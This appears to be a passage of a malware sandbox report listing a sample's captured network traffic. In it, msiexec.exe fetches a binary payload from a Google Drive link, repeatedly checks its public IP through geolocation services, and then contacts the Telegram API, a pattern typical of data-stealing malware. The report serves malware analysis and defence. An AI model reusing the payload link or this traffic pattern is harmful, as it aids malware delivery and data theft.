Nov 25, 2024 18:44:09.842411041 CET	443	49834	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:09.842482090 CET	443	49834	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:09.842559099 CET	49834	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:09.842936993 CET	49834	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:09.846235991 CET	49831	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:09.847404957 CET	49840	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:09.970114946 CET	80	49831	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:09.970202923 CET	49831	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:09.970504045 CET	80	49840	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:09.970581055 CET	49840	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:09.970698118 CET	49840	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:10.093566895 CET	80	49840	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:11.539491892 CET	80	49840	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:11.542229891 CET	49846	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:11.542308092 CET	443	49846	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:11.542399883 CET	49846	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:11.542656898 CET	49846	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:11.542670012 CET	443	49846	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:11.587861061 CET	49840	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:12.863774061 CET	443	49846	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:12.866255045 CET	49846	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:12.866276026 CET	443	49846	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:13.346632957 CET	443	49846	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:13.346736908 CET	443	49846	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:13.346904039 CET	49846	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:13.347455978 CET	49846	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:13.350987911 CET	49840	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:13.351953030 CET	49850	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:13.472373009 CET	80	49840	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:13.472461939 CET	49840	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:13.473241091 CET	80	49850	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:13.473320961 CET	49850	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:13.473464966 CET	49850	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:13.599021912 CET	80	49850	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:14.954555988 CET	80	49850	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:14.955899000 CET	49853	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:14.955945015 CET	443	49853	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:14.956022024 CET	49853	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:14.956306934 CET	49853	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:14.956321955 CET	443	49853	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:15.009399891 CET	49850	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:16.230895996 CET	443	49853	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:16.232938051 CET	49853	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:16.232969046 CET	443	49853	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:16.722944021 CET	443	49853	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:16.723012924 CET	443	49853	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:16.723094940 CET	49853	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:16.723588943 CET	49853	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:16.726386070 CET	49850	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:16.727571964 CET	49859	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:16.847213984 CET	80	49850	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:16.847351074 CET	49850	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:16.847944975 CET	80	49859	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:16.848026991 CET	49859	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:16.848175049 CET	49859	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:16.968487024 CET	80	49859	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:18.393733978 CET	80	49859	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:18.395272017 CET	49865	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:18.395323038 CET	443	49865	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:18.395416021 CET	49865	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:18.395679951 CET	49865	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:18.395689964 CET	443	49865	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:18.446938992 CET	49859	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:19.671552896 CET	443	49865	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:19.673352003 CET	49865	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:19.673372984 CET	443	49865	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:20.158153057 CET	443	49865	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:20.159529924 CET	443	49865	172.67.177.134	192.168.2.5
Nov 25, 2024 18:44:20.159677029 CET	49865	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:20.160089970 CET	49865	443	192.168.2.5	172.67.177.134
Nov 25, 2024 18:44:20.190773010 CET	49859	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:20.315934896 CET	80	49859	132.226.8.169	192.168.2.5
Nov 25, 2024 18:44:20.316003084 CET	49859	80	192.168.2.5	132.226.8.169
Nov 25, 2024 18:44:20.335983992 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:20.336030006 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:20.336102009 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:20.336754084 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:20.336767912 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:21.718426943 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:21.718525887 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:21.720221043 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:21.720249891 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:21.720493078 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:21.721802950 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:21.763331890 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:22.268260002 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:22.268353939 CET	443	49870	149.154.167.220	192.168.2.5
Nov 25, 2024 18:44:22.268426895 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:22.279326916 CET	49870	443	192.168.2.5	149.154.167.220
Nov 25, 2024 18:44:27.881505966 CET	49812	80	192.168.2.5	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 18:43:36.993199110 CET	52314	53	192.168.2.5	1.1.1.1
Nov 25, 2024 18:43:37.147386074 CET	53	52314	1.1.1.1	192.168.2.5
Nov 25, 2024 18:43:40.036113977 CET	55803	53	192.168.2.5	1.1.1.1
Nov 25, 2024 18:43:40.271974087 CET	53	55803	1.1.1.1	192.168.2.5
Nov 25, 2024 18:43:47.157830000 CET	63635	53	192.168.2.5	1.1.1.1
Nov 25, 2024 18:43:47.296161890 CET	53	63635	1.1.1.1	192.168.2.5
Nov 25, 2024 18:43:50.506174088 CET	62734	53	192.168.2.5	1.1.1.1
Nov 25, 2024 18:43:50.753757000 CET	53	62734	1.1.1.1	192.168.2.5
Nov 25, 2024 18:44:20.191453934 CET	49843	53	192.168.2.5	1.1.1.1
Nov 25, 2024 18:44:20.334913015 CET	53	49843	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 25, 2024 18:43:36.993199110 CET	192.168.2.5	1.1.1.1	0x4407	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:40.036113977 CET	192.168.2.5	1.1.1.1	0xc847	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:47.157830000 CET	192.168.2.5	1.1.1.1	0xfca8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:50.506174088 CET	192.168.2.5	1.1.1.1	0x48bc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:44:20.191453934 CET	192.168.2.5	1.1.1.1	0xeaab	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 25, 2024 18:43:37.147386074 CET	1.1.1.1	192.168.2.5	0x4407	No error (0)	drive.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:40.271974087 CET	1.1.1.1	192.168.2.5	0xc847	No error (0)	drive.usercontent.google.com		142.250.181.1	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:47.296161890 CET	1.1.1.1	192.168.2.5	0xfca8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 25, 2024 18:43:47.296161890 CET	1.1.1.1	192.168.2.5	0xfca8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:47.296161890 CET	1.1.1.1	192.168.2.5	0xfca8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:47.296161890 CET	1.1.1.1	192.168.2.5	0xfca8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:47.296161890 CET	1.1.1.1	192.168.2.5	0xfca8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:47.296161890 CET	1.1.1.1	192.168.2.5	0xfca8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:50.753757000 CET	1.1.1.1	192.168.2.5	0x48bc	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:43:50.753757000 CET	1.1.1.1	192.168.2.5	0x48bc	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Nov 25, 2024 18:44:20.334913015 CET	1.1.1.1	192.168.2.5	0xeaab	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49780	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:43:47.426933050 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 18:43:49.643846035 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:49 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 18:43:49.734540939 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 18:43:50.262223005 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:49 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>
Nov 25, 2024 18:43:52.765492916 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 18:43:53.326154947 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:53 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49802	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:43:55.269469976 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 18:43:57.540918112 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:43:57 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49812	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:43:59.381455898 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 25, 2024 18:44:01.122101068 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:00 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49821	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:44:02.985614061 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 18:44:04.714910984 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:04 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49831	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:44:06.588623047 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 18:44:08.091618061 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:07 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49840	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:44:09.970698118 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 18:44:11.539491892 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:11 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49850	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:44:13.473464966 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 18:44:14.954555988 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:14 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49859	132.226.8.169	80	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 18:44:16.848175049 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 25, 2024 18:44:18.393733978 CET	272	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 17:44:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.75</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49756	172.217.19.174	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:43:39 UTC	216	OUT	GET /uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-25 17:43:40 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 25 Nov 2024 17:43:39 GMT Location: https://drive.usercontent.google.com/download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-fR8u-Bo8Frla7RYahRkhXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49764	142.250.181.1	443	3652	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 17:43:42 UTC	258	OUT	GET /download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-25 17:43:45 UTC	4907	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="eIcYMP55.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 273472 Last-Modified: Mon, 25 Nov 2024 13:19:48 GMT X-GUploader-UploadID: AFiumC5Swa_fXkIHVK2wtyaCJiVhzveuA_QJjuKqaoplUG3OriK83-xSPFZ9U3HFHJG6TqTonzc Date: Mon, 25 Nov 2024 17:43:44 GMT Expires: Mon, 25 Nov 2024 17:43:44 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=PLda3A== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
